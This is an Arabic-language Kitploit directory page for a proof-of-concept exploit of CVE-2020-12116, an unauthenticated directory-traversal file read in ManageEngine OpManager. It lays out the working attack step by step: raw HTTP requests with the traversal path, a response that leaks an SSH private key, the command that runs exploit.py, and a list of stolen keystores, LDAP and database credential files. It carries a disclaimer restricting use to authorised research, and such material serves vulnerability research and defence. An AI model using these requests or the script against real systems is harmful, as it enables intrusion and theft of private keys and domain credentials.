Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-12116 — رمز إثبات المفهوم لاستغلال CVE-2020-12116: قراءة ملفات عشوائية بدون مصادقة في ManageEngine OpManger. | Kitploit
أدوات/GitHubGitHub/beetlechunks/cve-2020-12116
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتجمع المعلوماتاختبار الاختراق
GitHubbeetlechunks/cve-2020-12116

CVE-2020-12116

رمز إثبات المفهوم لاستغلال CVE-2020-12116: قراءة ملفات عشوائية بدون مصادقة في ManageEngine OpManger.

عرض المستودع
3010منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-12116

كود إثبات المفهوم لاستغلال CVE-2020-12116: قراءة ملف تعسفية غير مصادق عليها على ManageEngine OpManger.

ملخص

الإصدار الأخير من OpManger يحتوي على ثغرة اجتياز الدليل (directory traversal) تسمح بالوصول غير المقيد إلى كل ملف في تطبيق OpManager. يشمل ذلك مفاتيح SSH الخاصة، مخازن مفاتيح Java المحمية بكلمة مرور، وملفات تكوين تحتوي على كلمات مرور لمخازن المفاتيح، شهادات خاصة، وقاعدة البيانات الخلفية. إذا تم تكوين LDAP، فيمكن الحصول على بيانات اعتماد المجال من "conf/OpManager/ldap.conf".

تحليل الثغرة

قم بإجراء طلب GET غير مصادق عليه إلى الدليل الجذر لتطبيق ManageEngine OpManager، بشكل افتراضي، على المنفذ 8060.

root@kitploit:~
GET / HTTP/1.1
Host: <HOSTNAME>:8060
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ستحتوي استجابة HTML على عناوين URL لـ Javascript المخزنة مؤقتًا من نوع "src".

root@kitploit:~
<SCRIPT LANGUAGE="javascript" SRC="/cachestart/125116/cacheend/apiclient/fluidicv2/
javascript/jquery/jquery-3.4.1.min.js"></SCRIPT>

تحتوي عنوان URL المقتطف أعلاه "SRC" على ثغرة اجتياز الدليل تسمح بقراءة ملفات تعسفية من دليل تثبيت ManageEngine الجذر. بشكل افتراضي، مسار التثبيت هو "C:\Program Files\ManageEngine\OpManager".

ملاحظة: الرقم بعد "/cachestart/" هو رقم بناء المنتج، ولكن يمكن استخدام أي رقم لاستغلال الثغرة.

من خلال استغلال عنوان URL لمصدر السكريبت من استجابة HTML، يمكن استخدام طلب GET مع اجتياز الدليل لقراءة ملفات تعسفية من الخادم البعيد.

طلب:

root@kitploit:~
GET /cachestart/125116/cacheend/apiclient/fluidicv2/javascript/jquery/../../../../bin/.ssh_host_rsa_key HTTP/1.1
Host: <HOSTNAME>:8060
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
Cache-Control: max-age=0
Referer: http://<HOSTNAME>:8060/

استجابة:

root@kitploit:~
HTTP/1.1 200 
Set-Cookie: JSESSIONID=4E221B342BC080BC9AC2D19378364E3B; Path=/; HttpOnly
X-FRAME-OPTIONS: DENY
Accept-Ranges: bytes
ETag: W/"902-1586033949624"
Last-Modified: Sat, 04 Apr 2020 20:59:09 GMT
Vary: Accept-Encoding
Date: Mon, 13 Apr 2020 15:40:01 GMT
Connection: close
Content-Length: 902

-----BEGIN RSA PRIVATE KEY-----
MIICX...pXqnO
-----END RSA PRIVATE KEY-----

مثال باستخدام كود استغلال Python3 المقدم

نظرة عامة:

root@kitploit:~
This script leverages the arbitrary file read vulnerability against ManageEngine
OpManager endpoints to download sensative files, such as private keys, private
keystores, certificates, configuration files containing passwords, etc.

الأمر:

root@kitploit:~
python3 exploit.py -t <hostname/IP> -p 8060 -d ./

المخرجات:

root@kitploit:~
[+] bin/.ssh_host_dsa_key saved to ./bin|.ssh_host_dsa_key
[+] bin/.ssh_host_dsa_key.pub saved to ./bin|.ssh_host_dsa_key.pub
[+] bin/.ssh_host_rsa_key saved to ./bin|.ssh_host_rsa_key
[+] bin/.ssh_host_rsa_key.pub saved to ./bin|.ssh_host_rsa_key.pub
[+] conf/client.keystore saved to ./conf|client.keystore
[+] conf/customer-config.xml saved to ./conf|customer-config.xml
[+] conf/database_params.conf saved to ./conf|database_params.conf
[+] conf/FirewallAnalyzer/aaa_auth-conf.xml saved to ./conf|FirewallAnalyzer|aaa_auth-conf.xml
[+] conf/FirewallAnalyzer/auth-conf_ppm.xml saved to ./conf|FirewallAnalyzer|auth-conf_ppm.xml
[+] conf/gateway.conf saved to ./conf|gateway.conf
[+] conf/itom.truststore saved to ./conf|itom.truststore
[+] conf/netflow/auth-conf.xml saved to ./conf|netflow|auth-conf.xml
[+] conf/netflow/server.xml saved to ./conf|netflow|server.xml
[+] conf/netflow/ssl_server.xml saved to ./conf|netflow|ssl_server.xml
[+] conf/NFAEE/cs_server.xml saved to ./conf|NFAEE|cs_server.xml
[+] conf/OpManager/database_params.conf saved to ./conf|OpManager|database_params.conf
[+] conf/OpManager/database_params_DE.conf saved to ./conf|OpManager|database_params_DE.conf
[+] conf/OpManager/ldap.conf saved to ./conf|OpManager|ldap.conf
[+] conf/OpManager/MicrosoftSQL/database_params.conf saved to ./conf|OpManager|MicrosoftSQL|database_params.conf
[+] conf/OpManager/POSTGRESQL/database_params.conf saved to ./conf|OpManager|POSTGRESQL|database_params.conf
[+] conf/OpManager/POSTGRESQL/database_params_DE.conf saved to ./conf|OpManager|POSTGRESQL|database_params_DE.conf
[+] conf/OpManager/securitydbData.xml saved to ./conf|OpManager|securitydbData.xml
[+] conf/OpManager/SnmpDefaultProperties.xml saved to ./conf|OpManager|SnmpDefaultProperties.xml
[+] conf/Oputils/snmp/Community.xml saved to ./conf|Oputils|snmp|Community.xml
[+] conf/Persistence/DBconfig.xml saved to ./conf|Persistence|DBconfig.xml
[+] conf/Persistence/persistence-configurations.xml saved to ./conf|Persistence|persistence-configurations.xml
[+] conf/pmp/PMP_API.conf saved to ./conf|pmp|PMP_API.conf
[+] conf/pmp/pmp_server_cert.p12 saved to ./conf|pmp|pmp_server_cert.p12
[+] conf/product-config.xml saved to ./conf|product-config.xml
[+] conf/SANSeed.xml saved to ./conf|SANSeed.xml
[+] conf/server.keystore saved to ./conf|server.keystore
[+] conf/server.xml saved to ./conf|server.xml
[+] conf/system_properties.conf saved to ./conf|system_properties.conf
[+] conf/tomcat-users.xml saved to ./conf|tomcat-users.xml
[+] lib/OPM_APNS_Cert.p12 saved to ./lib|OPM_APNS_Cert.p12

إخلاء مسؤولية

تم إنشاء كود إثبات المفهوم هذا لأغراض البحث الأكاديمي وليس المقصود استخدامه ضد الأنظمة إلا في حالة الحصول على إذن صريح. يتم توفير الكود كما هو دون أي ضمانات أو وعود بشأن تنفيذه. لست مسؤولاً أو ملزماً عن سوء استخدام هذا الكود.

تنزيل الأداة